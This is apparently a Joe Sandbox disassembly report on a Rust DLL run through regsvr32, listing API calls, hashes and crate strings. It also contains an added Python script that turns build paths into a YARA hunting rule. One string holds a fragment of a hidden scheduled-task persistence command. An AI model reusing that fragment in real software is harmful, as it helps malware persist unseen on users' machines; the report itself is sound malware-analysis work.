                                                                    • String ID: )$Unable to read process memory informationReadProcessMemory returned unexpected number of bytes readUnable to read process dataC:\Users\win10-x64\.cargo\registry\src\index.crates.io-6f17d22bba15001f\sysinfo-0.32.0\src\windows\process.rs
                                                                    • API String ID: 389343282-4288831377
                                                                    • Opcode ID: 8857f9efc52670e43b70f703aa61541305eb4361517dbd41628f14e8ea00ce29
                                                                    • Instruction ID: c40737c02a9809e377a50a6bee3e837fea632fc13978ce9d0728e5580eb76c29
                                                                    • Opcode Fuzzy Hash: 8857f9efc52670e43b70f703aa61541305eb4361517dbd41628f14e8ea00ce29
                                                                    • Instruction Fuzzy Hash: BFA2A622B0AA8391EB74AB15E820BBA67A0FF45784F445535DAAD937EDDF3CE444C700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$ErrorHeapLast$AllocFree
                                                                    • String ID: $-$1$Pgy~$a Display implementation returned an error unexpectedly/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\alloc\src\string.rs$not yet implemented$tes 1)) -TaskName '' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)
                                                                    • API String ID: 2977971772-935880289
                                                                    • Opcode ID: 83f77a5db162ac7926c7f3f0995e1b4223b1c9889a58ce84648d1b6940cc856b
                                                                    • Instruction ID: b4810fa26776c22f6d4ea45b9526e9cd80f44e50a7934df13428e631886e31c4
                                                                    • Opcode Fuzzy Hash: 83f77a5db162ac7926c7f3f0995e1b4223b1c9889a58ce84648d1b6940cc856b
                                                                    • Instruction Fuzzy Hash: 83C25C3670EAC285EB709B11E490BEAB7A0EB85780F548126DADD47BADDF7CD145CB00
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: memcmp
                                                                    • String ID: 2Pz\
                                                                    • API String ID: 1475443563-2698464549
                                                                    • Opcode ID: 75670cabc425f8fffa7c9766c47395dec9cd841e19bce0a28a32af43702aeda1
                                                                    • Instruction ID: 60c1c14f64c28434bfe357fed50b6fd8fbb2f848e859c4782fc66e5c6eae0971
                                                                    • Opcode Fuzzy Hash: 75670cabc425f8fffa7c9766c47395dec9cd841e19bce0a28a32af43702aeda1
                                                                    • Instruction Fuzzy Hash: B1F2952670978286EB209B25A4607AA77A1FBD9BC4F444335EEDD53BADDF3CD2018704

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    [Control-flow graph node/edge listing for the function starting at 7ffdfb2ae2e0; its blocks call GetCurrentProcessId, ProcessPrng, ReadFileEx, GetLastError, CloseHandle and SleepEx]
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CurrentPrng
                                                                    • String ID:
                                                                    • API String ID: 716580790-0
                                                                    • Opcode ID: 16b35659de58f62212754a2bee746a30cdd65fbf360830230b8dc60c33c43456
                                                                    • Instruction ID: 78da821a8b2645110738e7be7791413b5d202e5138f9f212012ece86c6e63259
                                                                    • Opcode Fuzzy Hash: 16b35659de58f62212754a2bee746a30cdd65fbf360830230b8dc60c33c43456
                                                                    • Instruction Fuzzy Hash: 7A22F632B06A939AE754BF21D8207F93B94BB44798F244635DA6D8B7E9DF3CD5428300

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    [Control-flow graph node/edge listing for the function starting at 7ffdfb20f280; its blocks call GetSystemInfo and memcpy]
                                                                    APIs
                                                                    Strings
                                                                    • 0, xrefs: 00007FFDFB20F3B5
                                                                    • unknownARM x64C:\Users\win10-x64\.cargo\registry\src\index.crates.io-6f17d22bba15001f\sysinfo-0.32.0\src\windows\cpu.rs, xrefs: 00007FFDFB20F617
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$InfoSystem
                                                                    • String ID: 0$unknownARM x64C:\Users\win10-x64\.cargo\registry\src\index.crates.io-6f17d22bba15001f\sysinfo-0.32.0\src\windows\cpu.rs
                                                                    • API String ID: 1915069931-2550612777
                                                                    • Opcode ID: d6a2272041e40b724aa20a5dacbb8995ec4afb1dcaeccf49d007e1a5f260c61b
                                                                    • Instruction ID: 020b465ef59ffacb435307f432f2c08f4db693b68906b08153f147add0df0cde
                                                                    • Opcode Fuzzy Hash: d6a2272041e40b724aa20a5dacbb8995ec4afb1dcaeccf49d007e1a5f260c61b
                                                                    • Instruction Fuzzy Hash: 24326022B0E6C281E7609B11A460BAAA761FB857C0F588135DEED47BEEDF7CE5458700
                                                                    Similarity
                                                                    • API ID: memcpy$GlobalInfoMemoryPerformanceStatusmemcmp
                                                                    • String ID: 2Pz\
                                                                    • API String ID: 814616673-2698464549
                                                                    • Opcode ID: 3a482ac07fc9ee52deb5603def4d416b97b7fdd24e7918671344e7f49f44414d
                                                                    • Instruction ID: 05e85cb040d05d5f8c9b1370eb6ea41d39541d51722f689a09a48b5cc2b19548
                                                                    • Opcode Fuzzy Hash: 3a482ac07fc9ee52deb5603def4d416b97b7fdd24e7918671344e7f49f44414d
                                                                    • Instruction Fuzzy Hash: 36B2426670968286DB20DB11A45066B7BA1FBCDBC8F444235EEDD83BADDF3DD6018B04

                                                                    Similarity
                                                                    • API ID: InformationQuerySystem
                                                                    • String ID: yW
                                                                    • API String ID: 3562636166-791297507
                                                                    • Opcode ID: 52d47727048697872374a12b89f7e4276d110ab87487e43d9b766e2cb48f168f
                                                                    • Instruction ID: 2e0485a66261c192e45394b6a8960b820679766ba9fe9f4ed5a280282feec4e2
                                                                    • Opcode Fuzzy Hash: 52d47727048697872374a12b89f7e4276d110ab87487e43d9b766e2cb48f168f
                                                                    • Instruction Fuzzy Hash: 7D31906270EB8285FB619B01A420BABB691EB847D4F944535DE9CC7BEDCF3DD0848B00
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 144d6ee9d57e6719ed89032d55413ed7ca63a30b44577e094033f07e3ff41f05
                                                                    • Instruction ID: 36b19964d8be72c328824149becd53dab0610fa38a04fb5b169c6cf5bca005ff
                                                                    • Opcode Fuzzy Hash: 144d6ee9d57e6719ed89032d55413ed7ca63a30b44577e094033f07e3ff41f05
                                                                    • Instruction Fuzzy Hash: C0E0D821BA48D5DDFF06EB749C169F463B1BF90358F480611E94D05154BE38C3D1C300

                                                                    Control-flow Graph

                                                                    Similarity
                                                                    • API ID: CloseHandle$ErrorLastObjectSingleWait
                                                                    • String ID: called `Result::unwrap()` on an `Err` value
                                                                    • API String ID: 1454876536-2333694755
                                                                    • Opcode ID: 685dcc371962ab0a9f66f19c316897fb5882e323e4b61a22f2613bda1f7e35e7
                                                                    • Instruction ID: b65060f9f7435d31af299ee2618bcf39e218cdb4717c79a1c29d636237224678
                                                                    • Opcode Fuzzy Hash: 685dcc371962ab0a9f66f19c316897fb5882e323e4b61a22f2613bda1f7e35e7
                                                                    • Instruction Fuzzy Hash: B5C15D32B09A4399EB10AF61D860BED27A4FB44788F144531EE6D96AEDDF38E585C340

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • TlsGetValue.KERNEL32(?,?,?,00007FFDFB25CF3B,?,?,?,?,?,?,00007FFDFB22777D), ref: 00007FFDFB25CAD9
                                                                    • TlsGetValue.KERNEL32(?,?,?,00007FFDFB25CF3B,?,?,?,?,?,?,00007FFDFB22777D), ref: 00007FFDFB25CB2F
                                                                    • TlsSetValue.KERNEL32(?,?,?,00007FFDFB25CF3B,?,?,?,?,?,?,00007FFDFB22777D), ref: 00007FFDFB25CB3F
                                                                    • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00007FFDFB25CF3B,?,?,?,?,?,?,00007FFDFB22777D), ref: 00007FFDFB25CBB9
                                                                    • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00007FFDFB25CF3B,?,?,?,?,?,?,00007FFDFB22777D), ref: 00007FFDFB25CC20
                                                                    • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FFDFB25CF3B,?,?,?,?,?,?,00007FFDFB22777D), ref: 00007FFDFB25CC30
                                                                    • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00007FFDFB25CF3B,?,?,?,?,?,?,00007FFDFB22777D), ref: 00007FFDFB25CC8C
                                                                    Similarity
                                                                    • API ID: Value
                                                                    • String ID: falsetrue
                                                                    • API String ID: 3702945584-2583396087
                                                                    • Opcode ID: 0a68dd2e9f831320d73f1ffa4997c7c3273a9ec5a24f8e071783848aa26efe7f
                                                                    • Instruction ID: 8caf11dd877188ed00fb9f0defcbb66359eca6bd80857e60855a92d5c9248033
                                                                    • Opcode Fuzzy Hash: 0a68dd2e9f831320d73f1ffa4997c7c3273a9ec5a24f8e071783848aa26efe7f
                                                                    • Instruction Fuzzy Hash: B061B022F0F55742FB5476198530BBD56D1AF45BC4F088434CEAD8BBEEEE6DA8428380

                                                                    Control-flow Graph

                                                                    Similarity
                                                                    • API ID: ErrorLast$CloseHandle
                                                                    • String ID:
                                                                    • API String ID: 3463825546-0
                                                                    • Opcode ID: fa647eda8c91a7695ec1f37dd5fdc2b06cb930c9a972b8361209d69e79ea7fba
                                                                    • Instruction ID: 090836f11bc24bf1d03a9a24c9e58f21ed398a811d4375ea3eea86c2896cd951
                                                                    • Opcode Fuzzy Hash: fa647eda8c91a7695ec1f37dd5fdc2b06cb930c9a972b8361209d69e79ea7fba
                                                                    • Instruction Fuzzy Hash: FE61F691F0E65356FB2596219420BB92BE8AF05BD8F184131CEAD8F7EDDE3CD8468701

                                                                    Control-flow Graph

                                                                    Similarity
                                                                    • API ID: CloseCreateEventHandleOverlappedResult
                                                                    • String ID:
                                                                    • API String ID: 3756958029-0
                                                                    • Opcode ID: 0ac5af106a73d8143591ed08cd212933c0e4614fbfce0bbc79ddda803c71490c
                                                                    • Instruction ID: a439e0cba35e8800e932d4cc44066a6c1c03e7cc9c2f88bfa7651e90afcd5631
                                                                    • Opcode Fuzzy Hash: 0ac5af106a73d8143591ed08cd212933c0e4614fbfce0bbc79ddda803c71490c
                                                                    • Instruction Fuzzy Hash: 4661AA22F09A4399FB10BA7585617FC1BA4AF147D8F240531DE1D9ABEDDF28D5878340

                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$cannot access a Thread Local Storage value during or after destruction/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\std\src\thread\local.rs
                                                                    • API String ID: 0-1373735107
                                                                    • Opcode ID: c5f7fa2330461c43e2abd6da7f8019c563dceb6ff5d3f9ebfd521dec14973f29
                                                                    • Instruction ID: b38b58083ac2b4e6ef287b591938bd46394cadadaa9fc0b5bd9a13137cc2e882
                                                                    • Opcode Fuzzy Hash: c5f7fa2330461c43e2abd6da7f8019c563dceb6ff5d3f9ebfd521dec14973f29
                                                                    • Instruction Fuzzy Hash: 69B1C122A29BC282E7618B28E4517FBA360FBD5344F109325EBD942BD9DF7DD1858740

                                                                    Control-flow Graph (rendered graph not preserved; recoverable data only): entry block 7ffdfb220280, basic blocks spanning 7ffdfb220280-7ffdfb2209be; the block at 7ffdfb2202b6 calls PdhCollectQueryData; the remaining edges are calls to internal routines 7ffdfb20a8d0, 7ffdfb20a8e0, 7ffdfb20e670, 7ffdfb20ed90, 7ffdfb20ef30, 7ffdfb20f280, 7ffdfb20fe90, 7ffdfb2194a0, 7ffdfb222a60, 7ffdfb224840, 7ffdfb243c60, 7ffdfb2deab0, 7ffdfb2e0010, 7ffdfb2eb5a0, 7ffdfb2eba00, 7ffdfb2ebcd0, 7ffdfb301ebc and 7ffdfb302850. The executed/not-executed colouring of the original graph is lost.
                                                                    Strings
                                                                    • global_key_idle disappearedC:\Users\win10-x64\.cargo\registry\src\index.crates.io-6f17d22bba15001f\sysinfo-0.32.0\src\windows\system.rs, xrefs: 00007FFDFB220802
                                                                    • key_used disappeared, xrefs: 00007FFDFB2207EA
                                                                    • cannot access a Thread Local Storage value during or after destruction/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\std\src\thread\local.rs, xrefs: 00007FFDFB220826
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: CollectDataQuery
                                                                    • String ID: cannot access a Thread Local Storage value during or after destruction/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\std\src\thread\local.rs$global_key_idle disappearedC:\Users\win10-x64\.cargo\registry\src\index.crates.io-6f17d22bba15001f\sysinfo-0.32.0\src\windows\system.rs$key_used disappeared
                                                                    • API String ID: 777096026-328276081
                                                                    • Opcode ID: 453ddf9edeeb583c801d8fc90883f689bf0d6e275f5c04062410226dc8c6ab7a
                                                                    • Instruction ID: 65039e16fe7a7d53095c8ed546cea610c314ae972144d34586f68420e2426eb5
                                                                    • Opcode Fuzzy Hash: 453ddf9edeeb583c801d8fc90883f689bf0d6e275f5c04062410226dc8c6ab7a
                                                                    • Instruction Fuzzy Hash: 7902B226B0AB8381F7509B21E4617AA77A0FB85B94F944135EEAD877E9DF7CE045C300

                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandle$CreateErrorEventLast
                                                                    • String ID:
                                                                    • API String ID: 3743700123-0
                                                                    • Opcode ID: 187fd84782cf0cb99c379f745ced377e887223e323960078e0587435b871c7fe
                                                                    • Instruction ID: a7a2083673178a59781de5daa898e1f9ac419b5f18b1ccb44281d3b9e17867de
                                                                    • Opcode Fuzzy Hash: 187fd84782cf0cb99c379f745ced377e887223e323960078e0587435b871c7fe
                                                                    • Instruction Fuzzy Hash: 8F11B722B4AB0356F7196B12A561B792690FF88794F184134EEAC47BD5EF3CA4E28300

                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$ProcessTimes
                                                                    • String ID:
                                                                    • API String ID: 3369102921-0
                                                                    • Opcode ID: debd1675c3c39d47079517bf0f8391c329cbe455144f0d50b94dce6023240213
                                                                    • Instruction ID: 50153035a9b8d38f3d92a04a5a631282d38c2e0cdba321963cb2ca90d661c109
                                                                    • Opcode Fuzzy Hash: debd1675c3c39d47079517bf0f8391c329cbe455144f0d50b94dce6023240213
                                                                    • Instruction Fuzzy Hash: 3F81C37270ABC691E7219B15E444BAAB764FB99BC4F444226EEDC53BA9DF3CC144C700

                                                                    APIs
                                                                    • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00007FFDFB25CF3B,?,?,?,?,?,?,00007FFDFB22777D), ref: 00007FFDFB25CBB9
                                                                    • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00007FFDFB25CF3B,?,?,?,?,?,?,00007FFDFB22777D), ref: 00007FFDFB25CC20
                                                                    • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FFDFB25CF3B,?,?,?,?,?,?,00007FFDFB22777D), ref: 00007FFDFB25CC30
                                                                    • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00007FFDFB25CF3B,?,?,?,?,?,?,00007FFDFB22777D), ref: 00007FFDFB25CC8C
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Value
                                                                    • String ID:
                                                                    • API String ID: 3702945584-0
                                                                    • Opcode ID: facdd1d30bccc6831c85d12e0ebd297498cc88624c2147c8a7189ade048d0423
                                                                    • Instruction ID: 210869a62de7bcf3dd5ffa3464d675dd295047a688337f6d0a782cc982acebdc
                                                                    • Opcode Fuzzy Hash: facdd1d30bccc6831c85d12e0ebd297498cc88624c2147c8a7189ade048d0423
                                                                    • Instruction Fuzzy Hash: A921B322B0A64741FF056A199534BB963D1AF45FC4F088135CD6C8B7EEDE6DA4428380

                                                                    Control-flow Graph (rendered graph not preserved; recoverable data only): entry block 7ffdfb21f640, basic blocks spanning 7ffdfb21f640-7ffdfb21f983; the block at 7ffdfb21f6b1 calls ReadProcessMemory; the block at 7ffdfb21f847 calls 7ffdfb21f640 again, so the function re-enters itself; the other edges are calls to internal routines 7ffdfb20a8d0, 7ffdfb20a8e0, 7ffdfb21f360, 7ffdfb255f90, 7ffdfb256b10, 7ffdfb29b9f0, 7ffdfb2b7970, 7ffdfb2deab0 and 7ffdfb302850. The executed/not-executed colouring of the original graph is lost.
                                                                    Strings
                                                                    • ReadProcessMemory returned unexpected number of bytes readUnable to read process dataC:\Users\win10-x64\.cargo\registry\src\index.crates.io-6f17d22bba15001f\sysinfo-0.32.0\src\windows\process.rs, xrefs: 00007FFDFB21F735
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: MemoryProcessRead
                                                                    • String ID: ReadProcessMemory returned unexpected number of bytes readUnable to read process dataC:\Users\win10-x64\.cargo\registry\src\index.crates.io-6f17d22bba15001f\sysinfo-0.32.0\src\windows\process.rs
                                                                    • API String ID: 1726664587-463925288
                                                                    • Opcode ID: 9e91fe6fbcf09cca1b6138462308769329588dadde7ab4543284a0c8432d20a4
                                                                    • Instruction ID: 8658a7cc62d35853634408dcade709a591ac53f75002efb5f28b85cb4a56d4bc
                                                                    • Opcode Fuzzy Hash: 9e91fe6fbcf09cca1b6138462308769329588dadde7ab4543284a0c8432d20a4
                                                                    • Instruction Fuzzy Hash: 9F81D622B0E69391E7219B119421BBA63A1BF457D0F449630EEBD877EDDF3DD6428700
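The strings attached to the PdhCollectQueryData routine above and to this ReadProcessMemory routine are Rust panic-location strings (message and source path stored back to back), and they leak the build environment of the regsvr32-hosted module: the cargo registry path with the building user's profile name (win10-x64), the crate directory (sysinfo-0.32.0, the crate that implements the process and CPU enumeration seen in these functions) and the rustc toolchain commit hash baked into the std path. These fragments are the most useful pivots in this part of the report, because any other sample built on the same machine or toolchain carries the same paths. The script below is an added example, not part of the Joe Sandbox report or of the sample: it parses exactly the three strings shown above (copied from the listing) into those fields and renders a hypothetical YARA rule from them. The regular expressions, the BuildArtifacts structure, the rule name and the rule condition are this example's own assumptions; the cargo-path pattern assumes the standard `~/.cargo/registry/src/<registry>/<crate>-<version>/` layout.

```python
import re
from dataclasses import dataclass, field

# The three strings copied from the function listings above. Rust stores the
# panic message and the panic location back to back, so the Windows path is
# glued onto the preceding text without a separator; the patterns below
# therefore anchor on the path itself rather than on whitespace.
SAMPLE_STRINGS = [
    r"global_key_idle disappearedC:\Users\win10-x64\.cargo\registry\src\index.crates.io-6f17d22bba15001f\sysinfo-0.32.0\src\windows\system.rs",
    r"cannot access a Thread Local Storage value during or after destruction/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\std\src\thread\local.rs",
    r"ReadProcessMemory returned unexpected number of bytes readUnable to read process dataC:\Users\win10-x64\.cargo\registry\src\index.crates.io-6f17d22bba15001f\sysinfo-0.32.0\src\windows\process.rs",
]

# <drive>:\Users\<user>\.cargo\registry\src\<registry>\<crate>-<semver>\<path>.rs
# (assumed standard cargo registry layout; the crate name is matched lazily so
# that hyphenated crate names such as windows-sys-0.52.0 split correctly)
CARGO_PATH = re.compile(
    r"[A-Za-z]:\\Users\\(?P<user>[^\\]+)\\\.cargo\\registry\\src\\"
    r"(?P<registry>[^\\]+)\\"
    r"(?P<crate>[A-Za-z0-9_-]+?)-(?P<version>\d+\.\d+\.\d+(?:[-+][0-9A-Za-z.]+)?)\\"
    r"(?P<file>\S+?\.rs)"
)
# /rustc/<40-hex commit>/library/... is the toolchain commit baked into std paths
RUSTC_PATH = re.compile(r"/rustc/(?P<commit>[0-9a-f]{40})[\\/](?P<file>\S+?\.rs)")


@dataclass
class BuildArtifacts:
    """Build-environment fragments recovered from a sample's strings (example type)."""
    build_users: set[str] = field(default_factory=set)
    registries: set[str] = field(default_factory=set)
    crates: dict[str, set[str]] = field(default_factory=dict)  # crate -> versions
    rustc_commits: set[str] = field(default_factory=set)
    source_files: set[str] = field(default_factory=set)


def extract_build_artifacts(strings) -> BuildArtifacts:
    """Pull user profile, registry, crate/version and rustc commit out of
    Rust panic-location strings such as the ones in the listing above."""
    art = BuildArtifacts()
    for s in strings:
        for m in CARGO_PATH.finditer(s):
            art.build_users.add(m["user"])
            art.registries.add(m["registry"])
            art.crates.setdefault(m["crate"], set()).add(m["version"])
            art.source_files.add(f"{m['crate']}-{m['version']}\\{m['file']}")
        for m in RUSTC_PATH.finditer(s):
            art.rustc_commits.add(m["commit"])
            art.source_files.add("rustc\\" + m["file"])
    return art


def _yara_escape(s: str) -> str:
    # YARA text strings need backslashes and double quotes escaped
    return s.replace("\\", "\\\\").replace('"', '\\"')


def to_yara(art: BuildArtifacts, rule_name: str = "rust_build_env_cluster") -> str:
    """Render the fragments as a hypothetical YARA rule for pivoting to other
    samples from the same build machine or toolchain (example output, not
    something the report contains)."""
    literals = []
    for crate, versions in sorted(art.crates.items()):
        for version in sorted(versions):
            literals.append(f"\\{crate}-{version}\\")
    for user in sorted(art.build_users):
        literals.append(f"\\Users\\{user}\\.cargo\\registry\\")
    for commit in sorted(art.rustc_commits):
        literals.append(f"/rustc/{commit}")
    out = [f"rule {rule_name}", "{", "    strings:"]
    for i, lit in enumerate(literals, 1):
        out.append(f'        $s{i} = "{_yara_escape(lit)}" ascii')
    # The rustc commit alone matches every binary built with that toolchain and
    # a crate directory alone matches every user of that crate version, so the
    # rule requires two independent fragments before it flags a PE file.
    out += ["    condition:", "        uint16(0) == 0x5A4D and 2 of them", "}"]
    return "\n".join(out)


if __name__ == "__main__":
    artifacts = extract_build_artifacts(SAMPLE_STRINGS)
    print(artifacts)
    print(to_yara(artifacts))
```

The user profile name is the strongest of the three pivots because it identifies one build machine rather than one toolchain or one crate release; the rustc commit can be matched against the rust-lang/rust release tags to date the toolchain, and the crate version bounds the date at which the sample was compiled.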
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: InfoPerformance
                                                                    • String ID: @
                                                                    • API String ID: 3070290716-2766056989
                                                                    • Opcode ID: f62ca9aa1ecd407958618594fd8f5d881816df793d774b0212e8ce3adadf7aaa
                                                                    • Instruction ID: cf5f8ed0d4802c1a68c6391d4c12ee7466bb4b99522bde3a1b0ae7f9444f5b97
                                                                    • Opcode Fuzzy Hash: f62ca9aa1ecd407958618594fd8f5d881816df793d774b0212e8ce3adadf7aaa
                                                                    • Instruction Fuzzy Hash: 26317221A18AC181F7724728A4067E6A3B4BFD5368F405320EFDC867A9EF3DD1C68B40
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Process$OpenTimes
                                                                    • String ID:
                                                                    • API String ID: 7699560-0
                                                                    • Opcode ID: b82240550894807557adba87751f104dd04fd2f0f4657b4aa3b1416aed29df14
                                                                    • Instruction ID: 67c7f57940c4f33f2702c449b933a9ffb42ea5e8e6e737045ce916c5c79f65ff
                                                                    • Opcode Fuzzy Hash: b82240550894807557adba87751f104dd04fd2f0f4657b4aa3b1416aed29df14
                                                                    • Instruction Fuzzy Hash: FF818822B19BC282E7549F25A4507AA73A0FB857D4F149235EFEE467E9DF7DE0848300
                                                                    APIs
                                                                    • WaitOnAddress.API-MS-WIN-CORE-SYNCH-L1-2-0(?,?,?,00000000,00000000,?,?,00000000,?,00007FFDFB26469D), ref: 00007FFDFB2B994B
                                                                    • GetLastError.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,?,00007FFDFB26469D), ref: 00007FFDFB2B9955
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
